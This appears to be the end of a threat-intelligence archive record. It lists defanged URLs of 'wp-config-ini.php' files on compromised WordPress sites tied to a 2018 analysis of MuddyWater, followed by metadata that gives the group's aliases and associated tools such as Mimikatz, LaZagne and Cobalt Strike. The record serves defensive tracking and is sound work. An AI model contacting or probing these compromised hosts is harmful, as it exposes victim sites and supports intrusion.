hxxp://bntlaminates[.]com//wp-config-ini.php\r\nhxxp://embali[.]co.za//wp-config-ini.php\r\nhxxp://beadbazaar[.]com.au/assets/css/wp-config-ini.php\r\nhxxp://www.centreforgovernance.uk//wp-config-ini.php\r\nhxxp://www.icsswaziland[.]com//wp-config-ini.php\r\nhxxps://bulinvestconsult[.]com//wp-config-ini.php\r\nhxxp://www.bhsmusic.net//wp-config-ini.php\r\nhxxp://fragranceoil[.]co.za//wp-config-ini.php\r\nhxxp://gvs[.]com.pk/font-awesome/wp-config-ini.php\r\nhxxp://billielaw[.]com//wp-config-ini.php\r\nhxxp://bagadesign.pt//wp-config-ini.php\r\nhxxp://bahaykuboeliterealty[.]com.au//wp-config-ini.php\r\nhxxp://haveytv[.]com//wp-config-ini.php\r\nhxxp://www.animationinisrael[.]org/tmp_images/wp-config-ini.php\r\nhxxp://www.buhlebayoacademy[.]com//wp-config-ini.php\r\nhxxp://aexergy[.]com//wp-config-ini.php\r\nhxxps://best-dreams[.]com//wp-config-ini.php\r\nhxxp://blackthorn[.]co.za//wp-config-ini.php\r\nhxxp://getabletravel[.]co.za/wpscripts/wp-config-ini.php\r\nhxxp://www.amazingtour.pk//wp-config-ini.php\r\nhxxp://printernet[.]co.za//wp-config-ini.php\r\nhxxp://genesisbs[.]co.za//wp-config-ini.php\r\nhxxp://cybercraft.biz/dist/wp-config-ini.php\r\nhxxps://www.bcppro[.]com//wp-config-ini.php\r\nhxxp://allsporthealthandfitness[.]com//wp-config-ini.php\r\nhxxp://www[.]competitiveedoptions[.]com//wp-config-ini.php\r\n
hxxp://www.humorcarbons[.]com//wp-config-ini.php\r\nhxxp://intelligentprotection[.]co.za//wp-config-ini.php\r\nhxxp://lppaportal[.]org.ls//wp-config-ini.php\r\nhxxp://incoso[.]co.za/images/wp-config-ini.php\r\nhxxp://webhostinc.net//wp-config-ini.php\r\nhxxp://bitteeth[.]com/docbank/wp-config-ini.php\r\nhxxp://mukhtarfeeds[.]com//wp-config-ini.php\r\nhxxp://isound[.]co.za//wp-config-ini.php\r\nhxxp://www.acer-parts[.]co.za//wp-config-ini.php\r\nhxxp://www.gsmmid[.]com//wp-config-ini.php\r\nhxxp://24newstube[.]com//wp-config-ini.php\r\nhxxp://goolinegaming[.]com//wp-config-ini.php\r\nhxxp://hisandherskennels[.]co.za/php/wp-config-ini.php\r\nhxxp://cmhts[.]co.za/resources/wp-config-ini.php\r\nhxxp://glgroup[.]co.za/images/wp-config-ini.php\r\nhxxp://thecompasssolutions[.]co.za//wp-config-ini.php\r\nhxxp://iggleconsulting[.]com//wp-config-ini.php\r\nhxxps://anotherdayinparadise.ca//wp-config-ini.php\r\nhxxp://cupboardcure[.]co.za/vendor/wp-config-ini.php\r\nhxxp://all2wedding[.]com/wp-includes/wp-config-ini.php\r\nhxxp://allianz[.]com.pe//wp-config-ini.php\r\nhxxps://bednbreakfasthotel[.]com//wp-config-ini.php\r\nhxxp://broken-arrow[.]co.za//wp-config-ini.php\r\nhxxp://aboutbodybuildingworkout[.]com//wp-config-ini.php\r\nhxxp://www.goolinespace[.]com//wp-config-ini.php\r\nhxxp://aqarco[.]com/wp-admin/wp-config-ini.php\r\n
hxxp://www.braidhairextensions[.]com//wp-config-ini.php\r\nhxxp://www.bhakkarrishtey[.]com//wp-config-ini.php\r\nhxxp://bestencouragementwords[.]com//wp-config-ini.php\r\nhxxp://agricolavicuna.cl//wp-config-ini.php\r\nhxxp://badlaretinaclinic[.]com/tmp/wp-config-ini.php\r\nhxxp://get-paid-for-online-survey[.]com//wp-config-ini.php\r\nhxxp://firstchoiceproperties[.]co.za//wp-config-ini.php\r\nhxxp://habibtextiles.pk//wp-config-ini.php\r\nhxxp://blueberrygroup[.]com.ar//wp-config-ini.php\r\nhxxp://abrahamseed[.]co.za//wp-config-ini.php\r\nhxxp://betandbeer.tips//wp-config-ini.php\r\nhxxp://molepetravel[.]co.ls//wp-config-ini.php\r\nhxxp://iiee.edu.pk//wp-config-ini.php\r\nhxxp://bella-yfaceandbodyproduct[.]com//wp-config-ini.php\r\nhxxp://www.algom-law[.]com//wp-config-ini.php\r\nhxxp://thelawyerscanvas.pk//wp-config-ini.php\r\nhxxp://satuwrite[.]com//wp-config-ini.php\r\nhxxp://bazinga-shop.eu//wp-config-ini.php\r\nhxxps://www.biosetinlabs[.]com/wp-admin/wp-config-ini.php\r\nSource: https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html"
	],
	"report_names": [
		"clearing-muddywater-analysis-of-new.html"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens",
				"ENT-11",
				"Earth Vetala",
				"ITG17",
				"MERCURY",
				"Mango Sandstorm",
				"MuddyWater",
				"STAC 1171",
				"Seedworm",
				"Static Kitten",
				"TA450",
				"TEMP.Zagros",
				"UNC3313",
				"Yellow Nix"
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434139,
	"ts_updated_at": 1775792062,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3ba6037dd03e2b92eae5ec5b7818723d13db4a5e.pdf",
		"text": "https://archive.orkl.eu/3ba6037dd03e2b92eae5ec5b7818723d13db4a5e.txt",
		"img": "https://archive.orkl.eu/3ba6037dd03e2b92eae5ec5b7818723d13db4a5e.jpg"
	}
}